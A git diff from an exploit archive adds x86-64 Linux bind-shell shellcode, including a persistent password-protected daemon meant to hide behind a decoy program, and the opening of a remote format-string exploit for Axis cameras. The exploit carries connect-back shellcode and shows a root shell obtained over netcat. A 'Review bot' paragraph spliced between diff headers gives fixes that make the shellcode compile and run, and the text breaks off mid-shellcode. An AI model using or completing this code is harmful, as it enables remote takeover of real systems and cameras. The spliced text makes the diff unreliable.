-40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution",2016-07-13,Metasploit,linux,remote,443
+40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress - Remote Code Execution",2016-07-13,Metasploit,linux,remote,443
 40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple CSRF Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0
 40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10 shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0
 40112,platforms/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,cgi,webapps,80
@@ -36280,3 +36280,7 @@ id,file,description,date,author,platform,type,port
 40118,platforms/windows/local/40118.txt,"Internet Explorer 11 (on Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)",2016-06-22,"Brian Pak",windows,local,0
 40119,platforms/linux/remote/40119.md,"DropBearSSHD <= 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote,0
 40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution and Escalate Privileges",2016-07-17,b0yd,hardware,remote,0
+40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell + (Multi-terminal) + Password + Daemon (83_ 148_ 177 bytes)",2016-07-19,CripSlick,lin_x86-64,shellcode,0
+40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Exploit",2016-07-19,bashis,multiple,remote,0
+40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
+40127,platforms/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
diff --git a/platforms/lin_x86-64/shellcode/40122.txt b/platforms/lin_x86-64/shellcode/40122.txt
new file mode 100755
index 000000000..438dc3048
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/40122.txt
@@ -0,0 +1,161 @@
+#include
+#include
+
+//| Exploit Title: [Syscall Persistent Bind Shell + (multi-terminal) + password + daemon (83, 148, 177 bytes)]
+//| Date: [7/15/2016]
+//| Exploit Author: [CripSlick]
+//| Tested on: [Kali 2.0 x86_x64]
+//| Version: [No Program Version, Only Syscalls Used]
+
+//| ShepherdDowling@gmail.com
+//| OffSec ID: OS-20614
+//| http://50.112.22.183/
+
+
+//|=========================================================================================
+//|=============== CripSlick's Persistent Bind-Shell with Port-Range + password ============
+//|
+//|
+//| CODE 3 Has everything to offer that CODE2 has and more. CODE2 has everything to offer
+//| that CODE1 has and more. CODE1 is still great due to being a very short bind shell.
+//| The point is that that there is really ONLY 1 shellcode here, it is just that CODE2 &
+//| CODE1 have less features to cut down on byte count giving you more options.
+//|
+//| Troubleshooting:
+//| 1. Problem: A lot of ports appeared on "nmap -p-" but not my port?
+//| 1. Answer: This is common when you swap the high and low port
+//|
+//| 2. Problem: I disconnected and can't reconnect (even when I use the right password)
+//| 2. Answer: This is common when re-executing the program (even after making changes)
+//| Solve this by closing the terminal completly out, going to your directory
+//| recompiling the program and then relaunching.
+//|
+//| If it is because you typed in the password wrong, wait about 60 seconds to
+//| re-connect. No re-execution of the program is required to reconnect for
+//| CODE2 & CODE3.
+//|
+//| 3. Problem: I DoS'd the victim
+//| 3. Answer: This probably was because you set the port range too broad. A broad port range
+//| takes a lot of CPU power. I suggest keeping it to how many terminals you need.
+//|
+
+
+
+#define PORT "\x11\x5a" // FORWARD BYTE ORDER
+//| PORT: 4442
+#define PASSWORD "\x6c\x61\x20\x63\x72\x69\x70\x73" // FORWARD BYTE ORDER
+//| PASSWORD = "la crips"
+
+//| ONLY CODE3 DOES NOT USE "PORT"; IT USES "LOW_PORT" & "HIGH_PORT"
+#define HIGH_PORT "\x5f\x11" // REVERSE BYTE ORDER
+#define LOW_PORT "\x5b\x11" // REVERSE BYTE ORDER
+//| PORTS: 4443-4447 (remember 4443 doesn't count so 4444-4447)
+//| (remember to use one terminal connection per open port)
+
+//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!=======================
+//| =========================================================================
+//| CODE1 The short bind shell (83 bytes)
+//| =========================================================================
+//| This is the shortest bind-shell I could make. I leaned that mov byte takes
+//| two bytes while Push+Pop takes 3 so I used more moves. Push+Pop is good if
+//| you don't want to xor a register but your stack must be NULL on top.
+//| This code only supports one terminal.
+
+unsigned char CODE1[] = //replace CODE1 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
+"\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02\x6a\x01\x5e\xb0\x29\x0f\x05\x48"
+"\x97\x6a\x02\x66\xc7\x44\x24\x02"PORT"\x54\x5e\x52\xb2\x10\xb0\x31"
+"\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b\x0f\x05\x40\x88\xc7\x40\xb6\x03"
+"\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xf6\x48\xf7\xe6\x50\x48\xbb"
+"\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
+
+//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!=======================
+//| =========================================================================
+//| CODE2 Persistent bind shell with a password (148 bytes)
+//| =========================================================================
+//| Supports re-connecting after a disconnect (close terminal and open up again)
+//| If you type in a password wrong, wait 60 seconds to reconnect.
+//| If you close the terminal after you enter the correct password, you can
+//| immediatly reconnect.
+//| This code only supports one terminal.
+
+
+unsigned char CODE2[] = //replace CODE2 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
+"\x48\x31\xff\x48\xf7\xe7\x48\x31\xf6\x6a\x39\x58\x0f\x05\x48\x31\xff"
+"\x48\x39\xf8\x74\x79\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02\x6a\x01\x5e"
+"\xb0\x29\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02"PORT"\x54\x5e"
+"\x52\xb2\x10\xb0\x31\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b\x0f\x05\x40"
+"\x88\xc7\x40\xb6\x03\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x89\xc7\x48"
+"\x89\xc6\x48\x8d\x74\x24\xf0\x6a\x10\x5a\x0f\x05\x48\xb8"PASSWORD""
+"\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x48\x31\xf6\x48\xf7"
+"\xe6\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b"
+"\x0f\x05\xe9\x6c\xff\xff\xff";
+
+
+//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!=======================
+//| =========================================================================
+//| CODE3 Persistent bind shell with multi-port/terminal + password (177 bytes)
+//| =========================================================================
+//| This bind shell has everything COD2 has to offer + more while only 29 bytes more
+//| You will get as many terminals on the victim as your PORT-RANGE minus 1
+//| Your lowest port will NOT be open (so minus 1 port/terminal from your range)
+//| Example: ports 4440-4445 = ports 4441-4445 usable = 5 terminals on victim
+
+
+unsigned char CODE3[] = //replace CODE3 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
+"\x48\x31\xf6\x56\x66\x68"HIGH_PORT"\x5b\x48\xff\xcb\x66\x81\xfb"LOW_PORT""
+"\x75\x06\x50\x66\x68"HIGH_PORT"\x5b\x48\x31\xff\x48\xf7\xe7\xb0\x39\x0f"
+"\x05\x48\x31\xff\x48\x39\xf8\x74\x7b\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02"
+"\x6a\x01\x5e\xb0\x29\x0f\x05\x48\x97\x86\xdf\x6a\x02\x66\x89\x5c\x24\x02"
+"\x86\xdf\x54\x5e\x52\xb2\x10\xb0\x31\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b"
+"\x0f\x05\x40\x88\xc7\x40\xb6\x03\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x89"
+"\xc7\x48\x89\xc6\x48\x8d\x74\x24\xf0\x6a\x10\x5a\x0f\x05\x48\xb8"PASSWORD""
+"\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x48\x31\xf6\x48\xf7\xe6"
+"\x50\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x51\x54\x5f\xb0\x3b\x0f\x05"
+"\x48\x31\xff\x48\xf7\xe7\xe9\x58\xff\xff\xff";
+
+
+
+//|========================== VOID SHELLCODE ===========================
+void SHELLCODE()
+{
+// This part floods the registers to make sure the shellcode will always run
+ __asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
+ "mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t"
+ "mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t"
+ "mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t"
+ "mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
+ "call CODE3"); //1st CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+}
+
+//|========================== VOID printBytes ===========================
+void printBytes()
+{
+printf("The CripSlick's code is %d Bytes Long\n",
+ strlen(CODE3)); //2nd CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+}
+
+
+//|============================== Int main ================================
+int main ()
+{
+
+// IMPORTANT> replace CODEX the "unsigned char" variable below
+// > This needs to be done twice (for string count + code to use)
+
+int pid = fork(); // fork start
+ if(pid == 0){ // pid always starts at 0
+
+ SHELLCODE(); // launch void SHELLCODE
+ // this is to represent a scenario where you bind to a good program
+ // you always want your shellcode to run first
+
+ }else if(pid > 0){ // pid will always be greater than 0 after the 1st process
+ // this argument will always be satisfied
+
+ printBytes(); // launch printBYTES
+ // pretend that this is the one the victim thinks he is only using
+ }
+return 0; // satisfy int main
+system("exit"); // keeps our shellcode a daemon
+}
+
diff --git a/platforms/multiple/remote/40125.py b/platforms/multiple/remote/40125.py
new file mode 100755
index 000000000..dbd1bb711
--- /dev/null
+++ b/platforms/multiple/remote/40125.py
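Review bot: The two `#include` directives at the top of 40122.txt carry no header name, so the file as committed does not compile; `printf`/`strlen`/`fork`/`system` need `#include <stdio.h>`, `#include <string.h>`, `#include <unistd.h>` and `#include <stdlib.h>` (the names were most likely stripped on the way into the tracker, so restoring them is the fix). In `main`, `return 0;` comes before `system("exit");`, making that call unreachable, and the comment `// keeps our shellcode a daemon` is therefore wrong: nothing here detaches the child (no `setsid`, no second fork, descriptors left open), it simply outlives the parent because the shellcode never returns. A `fork()` failure is also not handled, since -1 skips both branches and exits 0; use `pid_t pid = fork(); if (pid < 0) { perror("fork"); return 1; }`. `printf("... %d ...", strlen(CODE3))` passes a `size_t` to `%d` and should use `%zu`, and the reported length will be undercounted if a chosen PORT/PASSWORD byte is 0x00, which the surrounding text does not warn about. Because `call CODE3` executes bytes from a writable data array, the listing should also state the build flags that make that section executable (e.g. `-z execstack`), which the file does not show.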
@@ -0,0 +1,1730 @@
+#!/usr/bin/env python2.7
+#
+# [SOF]
+#
+# [Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon
+# Research and development by bashis 2016
+#
+# This format string vulnerability has following characteristic:
+# - Heap Based (Exploiting string located on the heap)
+# - Blind Attack (No output the remote attacker)(*)
+# - Remotly exploitable (As anonymous, no credentials needed)
+#
+# (*) Not so 'Blind' after all, since the needed addresses can be predicted by statistic.
+#
+# This exploit has following characteristic:
+# - Multiple architecture exploit (MIPS/CRISv32/ARM) [From version 5.20.x]
+# - Modifying LHOST/LPORT in shellcode on the fly
+# - Manual exploiting of remote targets
+# - Simple HTTPS support
+# - Basic Authorization support (not needed for this exploit)
+# - FMS dictionary and predicted addresses for GOT free() / BSS / Netcat shellcode
+# - Multiple shellcodes (ARM, CRISv32, MIPS and Netcat PIPE shell)
+# - Exploiting with MIPS, CRISv32 and ARM shellcode will give shell as root
+# - Exploiting with ARM Netcat PIPE shell give normally shell as Anonymous (5.2x and 5.4x give shell as root)
+# - Multiple FMS exploit techniques
+# - "One-Write-Where-And-What" for MIPS and CRISv32
+# Using "Old Style" POP's
+# Classic exploit using: Count to free() GOT, write shellcode address, jump to shellcode on free() call
+# Shellcode loaded in memory by sending shellcode URL encoded, that SSI daemon decodes and keeps in memory.
+# - "Two-Write-Where-And-What" for ARM +# 1) "Old Style": Writing 1x LSB and 1x MSB by using offsets for GOT free() target address +# 2) "New Style": ARM Arch's have both "Old Style" (>5.50.x) )POPs and "New Style" (<5.40.x) direct parameter access for POP/Write +# [Big differnce in possibilities between "Old Style" and "New Style", pretty interesting actually] +# - Another way to POP with "Old Style", to be able POPing with low as 1 byte (One byte with %1c instead of eight with %8x) +# - Exploit is quite well documented +# +# Anyhow, +# Everything started from this simple remote request: +# +# --- +# $ echo -en "GET /httpDisabled.shtml?&http_user=%p|%p HTTP/1.0\n\n" | netcat 192.168.0.90 80 +# HTTP/1.1 500 Server Error +# Content-Type: text/html; charset=ISO-8859-1 +# +# 500 Server Error +#

500 Server Error

+# The server encountered an internal error and could not complete your request. +# +# --- +# +# Which gave this output in /var/log/messages on the remote device: +# +# --- +# Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:635: getpwnam() failed for user: 0x961f0|0x3ac04b10 +# Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:303: Failed to get authorization data. +# --- +# +# Which resulted into an remote exploit for more than 200 unique Axis Communication MPQT/PACS products +# +# --- +# $ netcat -vvlp 31337 +# listening on [any] 31337 ... +# 192.168.0.90: inverse host lookup failed: Unknown host +# connect to [192.168.0.1] from (UNKNOWN) [192.168.0.90] 55738 +# id +# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel),51(viewer),52(operator),53(admin),54(system),55(ptz) +# pwd +# /usr/html +# --- +# +# Some technical notes: +# +# 1. Direct addressing with %$%n is "delayed", and comes in force only after disconnect. +# Old metod with POP's coming into force instantly +# +# 2. Argument "0" will be assigned (after using old POP metod and %n WRITE) the next address on stack after POP's) +# - Would be interesting to investigate why. +# +# 3. Normal Apache badbytes: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20, 0x23, 0x26 +# Goodbytes: 0x01-0x08, 0x0e-0x1f, 0x21-0x22, 0x24-0x25, 0x27-0xff +# +# 3.1 Normal Boa badbytes: 0x00-0x08, 0x0b-0x0c, 0x0e-0x19, 0x80-0xff +# Goodbytes: 0x09, 0x0a, 0x0d, 0x20-0x7f +# +# 3.2 Apache and Boa, by using URL encoded shellcode as in this exploit: +# Badbytes = None, Goodbytes = 0x00 - 0xff (Yay!) +# +# 4. Everything is randomized, except heap. +# +# 5. My initial attempts to use ROP's was not good, as I didn't want to create +# one unique FMS key by testing each single firmware version, and using ROP with FMS +# on heap seems pretty complicated as there is one jump availible, maximum two. +# +# 5.1 Classic GOT write for free() that will jump to shellcode, was the best technique in this case. +# +# 6. 
Encoded and Decoded shellcode located in .bss section. +# 6.1 FMS excecuted on heap +# +# 7. Vulnerable MPQT/PACS architectures: CRISv32, MIPS and ARM +# 7.1 ARM has nonexecutable stack flag bit set (>5.20.x) by default on their binaries/libs, +# so execute shellcode on heap/stack may be impossible. +# 7.2 ARM shellcode and exploit has been verified by setting executable stack flag bit on binaries, +# and re-compile of the image. +# 7.3 However, ARM is easily exploitable with netcat shell, that's using the builtin '/bin/sh -c' code to execute. +# +# 8. This exploit are pretty well documented, more details can be extracted by reading +# the code and comments. +# +# MIPS ssid maps +# 00400000-0040d000 r-xp 00000000 00:01 2272 /bin/ssid +# 0041d000-0041e000 rw-p 0000d000 00:01 2272 /bin/ssid +# 0041e000-00445000 rwxp 00000000 00:00 0 [heap] +# +# ARM ssid maps +# 00008000-00014000 r-xp 00000000 00:01 2055 /bin/ssid +# 0001c000-0001d000 rw-p 0000c000 00:01 2055 /bin/ssid +# 0001d000-00044000 rw-p 00000000 00:00 0 [heap] +# +# Crisv32 ssid maps +# 00080000-0008c000 r-xp 00000000 1f:03 115 /bin/ssid +# 0008c000-0008e000 rw-p 0000a000 1f:03 115 /bin/ssid +# 0008e000-000b6000 rwxp 0008e000 00:00 0 [heap] +# +# General notes: +# +# When the vul daemon process is exploited, and after popping root connect-back shell, +# the main process are usally restarted by respawnd, after the shell have spawned and taken over the parent process, +# when the main process are fully alive again, I can enjoy the shell, and everybody else can +# enjoy of the camera - that should make all of us happy ;) +# During exploiting, logs says almost nothing, only that the main process restarted. 
+# Note: Not true with ARM Netcat PIPE shell (as the code will vfork() and wait until child exits) +# +# '&http_user=' is the vuln tag, and the FMS will be excecuted when it will try to do vsyslog(), +# after ssid cannot verify the user, free() are the closest function to be called after +# vsyslog(), needed and perfect to use for jumping. +# There is nothing shown for remote user, possible output of FMS are _only_ shown in log/console. +# So we are pretty blind, but due to fixed FMS keys, that doesn't matter for us - it's predictable by statistics. +# +# Quite surprised to see so many different devices and under one major release version, +# that's covered by one "FMS key". The "FMS key" are valid for all minor versions under the major version. +# +# This made me start thinking how brilliant and clever it would be to make an sophisticated door that's using format string as backdoor, +# which generates no FMS output whatsoever to attacker and unlocked by a 'FMS key', instead of using hardcoded login/password. +# +# - No hardcoded login/password that could easily be found in firmware/software files. +# - Extremely hard to find without local access (and find out what to trigger for opening the door) +# - Nobody can not actually prove it is a sophisticated door for sure. "It's just another bug.. sorry! - here is the fixed version." +# (Only to close this door, and open another door, somewhere else, in any binary - and try make it harder to find) +# +# Note: +# I don't say that Axis Communication has made this hidden format string by this purpose. +# I can only believe it was a really stupid mistake from Axis side, after I have seen one screen-dump of the CVS changelog of SSI Daemon, +# and another screen-dump with the change made late 2009, from non-vulnerable to vulnerable, in the affected code of logerr(). 
+# +# Vulnerable and exploitable products +# +# A1001, A8004-VE, A9188, C3003, F34, F41, F44, M1124, M1124-E, M1125, M1125-E, M1145, M1145-L, M3006, +# M3007, M3026, M3027, M3037, M7010, M7011, M7014, M7016, P1125, P1353, P1354, P1355, P1357, P1364, +# P1365, P1405, P1405-E, P1405-LE, P1425-E, P1425-LE, P1427, P1427-E, P1435, P3214, P3214-V, P3215, +# P3215-V, P3224, P3224-LVE, P3225-LV, P3353, P3354, P3363, P3364, P3364-L, P3365, P3367, P3384, +# P3707-PE, P3904, P3904-R, P3905, P3915-R, P5414-E, P5415-E, P5514, P5514-E, P5515, P5515-E, P5624, +# P5624-E, P5635-E, P7210, P7214, P7216, P7224, P8535, Q1602, Q1604, Q1614, Q1615, Q1635, Q1635-E, +# Q1765-LE, Q1765-LE-PT, Q1775, Q1931-E, Q1931-E-PT, Q1932-E, Q1932-E-PT, Q1941-E, Q2901-E, Q2901-E-PT, +# Q3504, Q3505, Q6000-E, Q6042, Q6042-C, Q6042-E, Q6042-S, Q6044, Q6044-C, Q6044-E, Q6044-S, Q6045, +# Q6045-C, Q6045-E, Q6045-S, Q6114-E, Q6115-E, Q7411, Q7424-R, Q7436, Q8414, Q8414-LVS, Q8631-E, Q8632-E, +# Q8665-E, Q8665-LE, V5914, V5915, M1054, M1103, M1104, M1113, M1114, M2014-E, M3014, M3113, M3114, M3203, +# M3204, M5013, M5014, M7001, P12/M20, P1204, P1214, P1214-E, P1224-E, P1343, P1344, P1346, P1347, P2014-E, +# P3301, P3304, P3343, P3344, P3346, P3346-E, P5512, P5512-E, P5522, P5522-E, P5532, P5532-E, P5534, P5534-E, +# P5544, P8221, P8513, P8514, P8524, Q1755, Q1910, Q1921, Q1922, Q6032, Q6032-C, Q6032-E, Q6034, Q6034-C, +# Q6034-E, Q6035, Q6035-C, Q6035-E, Q7401, Q7404, Q7406, Q7414, Q8721-E, Q8722-E, C, M1004-W, M1011, M1011-W, +# M1013, M1014, M1025, M1031-W, M1033-W, M1034-W, M1143-L, M1144-L, M3004, M3005, M3011, M3024, M3024-L, +# M3025, M3044-V, M3045-V, M3046-V, P1311, P1428-E, P7701, Q3709-PVE, Q3708-PVE, Q6128-E... 
and more +# +# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt +# +# Firmware versions vulnerable to the SSI FMS exploit +# +# ('V.Vx' == The FMS key used in this exploit) +# +# Firmware Introduced CRISv32 MIPS ARM (no exec heap from >5.20.x) +# 5.00.x 2008 - - no +# 5.01.x 2008 no - no +# 5.02.x 2008 no - - +# 5.05.x 2009 no - - +# 5.06.x 2009 no - - +# 5.07.x 2009 no - no +# 5.08.x 2010 no - - +# 5.09.x 2010 no - - +# 5.10.x 2009 no - - +# 5.11.x 2010 no - - +# 5.12.x 2010 no - - +# 5.15.x 2010 no - - +# 5.16.x 2010 no - - +# 5.20.x 2010-2011 5.2x - 5.2x +# 5.21.x 2011 5.2x - 5.2x +# 5.22.x 2011 5.2x - - +# 5.25.x 2011 5.2x - - +# 5.40.x 2011 5.4x 5.4x 5.4x +# 5.41.x 2012 5.4x - - +# 5.50.x 2013 5.5x 5.5x 5.4x +# 5.51.x 2013 - 5.4x - +# 5.55.x 2013 - 5.5x 5.5x +# 5.60.x 2014 - 5.6x 5.6x +# 5.65.x 2014-2015 - 5.6x - +# 5.70.x 2015 - 5.7x - +# 5.75.x 2015 - 5.7x 5.7x +# 5.80.x 2015 - 5.8x 5.8x +# 5.81.x 2015 - 5.8x - +# 5.85.x 2015 - 5.8x 5.8x +# 5.90.x 2015 - 5.9x - +# 5.95.x 2016 - 5.9x 5.8x +# 6.10.x 2016 - 6.1x - +# 6.15.x 2016 - - 6.1x +# 6.20.x 2016 - 6.2x - +# +# Vendor URL's of still supported and affected products +# +# http://www.axis.com/global/en/products/access-control +# http://www.axis.com/global/en/products/video-encoders +# http://www.axis.com/global/en/products/network-cameras +# http://www.axis.com/global/en/products/audio +# +# Axis Product Security +# +# product-security@axis.com +# http://www.axis.com/global/en/support/product-security +# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt +# http://www.axis.com/global/en/support/faq/FAQ116268 +# +# Timetable +# +# - Research and Development: 06/01/2016 - 01/06/2016 +# - Sent vulnerability details to vendor: 05/06/2016 +# - Vendor responce received: 06/06/2016 +# - Vendor ACK of findings received: 07/06/2016 +# - Vendor sent verification image: 13/06/2016 +# - Confirmed that exploit do not work after vendors correction: 13/06/2016 +# - Vendor informed 
about their service release(s): 29/06/2016 +# - Sent vendor a copy of the (this) PoC exploit: 29/06/2016 +# - Full Disclosure: 18/07/2016 +# +# Quote of the day: Never say "whoops! :o", always say "Ah, still interesting! :>" +# +# Have a nice day +# /bashis +# +##################################################################################### + +import sys +import string +import socket +import time +import argparse +import urllib, urllib2, httplib +import base64 +import ssl +import re + + +class do_FMS: + +# POP = "%8x" # Old style POP's with 8 bytes per POP + POP = "%1c" # Old style POP's with 1 byte per POP + WRITElln = "%lln" # Write 8 bytes + WRITEn = "%n" # Write 4 bytes + WRITEhn = "%hn" # Write 2 bytes + WRITEhhn = "%hhn" # Write 1 byte + + def __init__(self,targetIP,verbose): + self.targetIP = targetIP + self.verbose = verbose + self.fmscode = "" + + # Mostly used internally in this function + def Add(self, data): + self.fmscode += data + + # 'New Style' Double word (8 bytes) + def AddDirectParameterLLN(self, ADDR): + self.Add('%') + self.Add(str(ADDR)) + self.Add('$lln') + + # 'New Style' Word (4 bytes) + def AddDirectParameterN(self, ADDR): + self.Add('%') + self.Add(str(ADDR)) + self.Add('$n') + + # 'New Style' Half word (2 bytes) + def AddDirectParameterHN(self, ADDR): + self.Add('%') + self.Add(str(ADDR)) + self.Add('$hn') + + # 'New Style' One Byte (1 byte) + def AddDirectParameterHHN(self, ADDR): + self.Add('%') + self.Add(str(ADDR)) + self.Add('$hhn') + + # Addressing + def AddADDR(self, ADDR): + self.Add('%') + self.Add(str(ADDR)) + self.Add('u') + + # 'Old Style' POP + def AddPOP(self, size): + if size != 0: + self.Add(self.POP * size) + + # Normally only one will be sent, multiple is good to quick-check for any FMS + # + # 'Old Style' Double word (8 bytes) + def AddWRITElln(self, size): + self.Add(self.WRITElln * size) + + # 'Old Style' Word (4 bytes) + def AddWRITEn(self, size): + self.Add(self.WRITEn * size) + + # 'Old Style' Half word (2 
bytes) + def AddWRITEhn(self, size): + self.Add(self.WRITEhn * size) + + # 'Old Style' One byte (1 byte) + def AddWRITEhhn(self, size): + self.Add(self.WRITEhhn * size) + + # Return the whole FMS string + def FMSbuild(self): + return self.fmscode + +class HTTPconnect: + + def __init__(self, host, proto, verbose, creds, noexploit): + self.host = host + self.proto = proto + self.verbose = verbose + self.credentials = creds + self.noexploit = noexploit + + # Netcat remote connectback shell needs to have raw HTTP connection as we using special characters as '\t','$','`' etc.. + def RAW(self, uri): + # Connect-timeout in seconds + timeout = 5 + socket.setdefaulttimeout(timeout) + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + tmp = self.host.split(':') + HOST = tmp[0] + PORT = int(tmp[1]) + if self.verbose: + print "[Verbose] Sending to:", HOST + print "[Verbose] Port:", PORT + print "[Verbose] URI:",uri + s.connect((HOST, PORT)) + s.send("GET %s HTTP/1.0\r\n\r\n" % uri) + html = (s.recv(4096)) # We really do not care whats coming back +# if html: +# print "[i] Received:",html + s.shutdown(3) + s.close() + return html + + + def Send(self, uri): + + # The SSI daemon are looking for this, and opens a new FD (5), but this does'nt actually + # matter for the functionality of this exploit, only for future references. 
+ headers = { + 'User-Agent' : 'MSIE', + } + + # Connect-timeout in seconds + timeout = 5 + socket.setdefaulttimeout(timeout) + + url = '%s://%s%s' % (self.proto, self.host, uri) + + if self.verbose: + print "[Verbose] Sending:", url + + if self.proto == 'https': + if hasattr(ssl, '_create_unverified_context'): + print "[i] Creating SSL Default Context" + ssl._create_default_https_context = ssl._create_unverified_context + + if self.credentials: + Basic_Auth = self.credentials.split(':') + if self.verbose: + print "[Verbose] User:",Basic_Auth[0],"Password:",Basic_Auth[1] + try: + pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm() + pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1]) + auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr) + opener = urllib2.build_opener(auth_handler) + urllib2.install_opener(opener) + except Exception as e: + print "[!] Basic Auth Error:",e + sys.exit(1) + + if self.noexploit and not self.verbose: + print "[<] 204 Not Sending!" + html = "Not sending any data" + else: + data = None + req = urllib2.Request(url, data, headers) + rsp = urllib2.urlopen(req) + if rsp: + print "[<] %s OK" % rsp.code + html = rsp.read() + return html + + +class shellcode_db: + + def __init__(self,targetIP,verbose): + self.targetIP = targetIP + self.verbose = verbose + + def sc(self,target): + self.target = target + + +# Connect back shellcode +# +# CRISv32: Written by myself, no shellcode availible out on "The Internet" +# NCSH: My PoC of netcat FIFO / PIPE reverese shell, w/o '-e' option and with $IFS as separators +# MIPSel: Written by Jacob Holcomb (url encoded by me) +# ARM: http://shell-storm.org/shellcode/files/shellcode-754.php +# + # Slightly modified syscall's + MIPSel = string.join([ + #close stdin + "%ff%ff%04%28" #slti a0,zero,-1 + "%a6%0f%02%24" #li v0,4006 + "%4c%f7%f7%03" #syscall 0xdfdfd + #close stdout + "%11%11%04%28" #slti a0,zero,4369 + "%a6%0f%02%24" #li v0,4006 + "%4c%f7%f7%03" #syscall 0xdfdfd + #close stderr + 
"%fd%ff%0c%24" #li t4,-3 + "%27%20%80%01" #nor a0,t4,zero + "%a6%0f%02%24" #li v0,4006 + "%4c%f7%f7%03" #syscall 0xdfdfd + # socket AF_INET (2) + "%fd%ff%0c%24" #li t4,-3 + "%27%20%80%01" #nor a0,t4,zero + "%27%28%80%01" #nor a1,t4,zero + "%ff%ff%06%28" #slti a2,zero,-1 + "%57%10%02%24" #li v0,4183 + "%4c%f7%f7%03" #syscall 0xdfdfd + # + "%ff%ff%44%30" # andi $a0, $v0, 0xFFFF + # + # dup2 stdout + "%c9%0f%02%24" #li v0,4041 + "%4c%f7%f7%03" #syscall 0xdfdfd + # + # dup2 stderr + "%c9%0f%02%24" #li v0,4041 + "%4c%f7%f7%03" #syscall 0xdfdfd + # + # Port + "PP1PP0%05%3c" + "%01%ff%a5%34" + # + "%01%01%a5%20" #addi a1,a1,257 + "%f8%ff%a5%af" #sw a1,-8(sp) + # + # IP + "IP3IP4%05%3c" + "IP1IP2%a5%34" + # + "%fc%ff%a5%af" #sw a1,-4(sp) + "%f8%ff%a5%23" #addi a1,sp,-8 + "%ef%ff%0c%24" #li t4,-17 + "%27%30%80%01" #nor a2,t4,zero + "%4a%10%02%24" #li v0,4170 + "%4c%f7%f7%03" #syscall 0xdfdfd + # + "%62%69%08%3c" #lui t0,0x6962 + "%2f%2f%08%35" #ori t0,t0,0x2f2f + "%ec%ff%a8%af" #sw t0,-20(sp) + "%73%68%08%3c" #lui t0,0x6873 + "%6e%2f%08%35" #ori t0,t0,0x2f6e + "%f0%ff%a8%af" #sw t0,-16(sp + "%ff%ff%07%28" #slti a3,zero,-1 + "%f4%ff%a7%af" #sw a3,-12(sp) + "%fc%ff%a7%af" #sw a3,-4(sp + "%ec%ff%a4%23" #addi a0,sp,-20 + "%ec%ff%a8%23" #addi t0,sp,-20 + "%f8%ff%a8%af" #sw t0,-8(sp) + 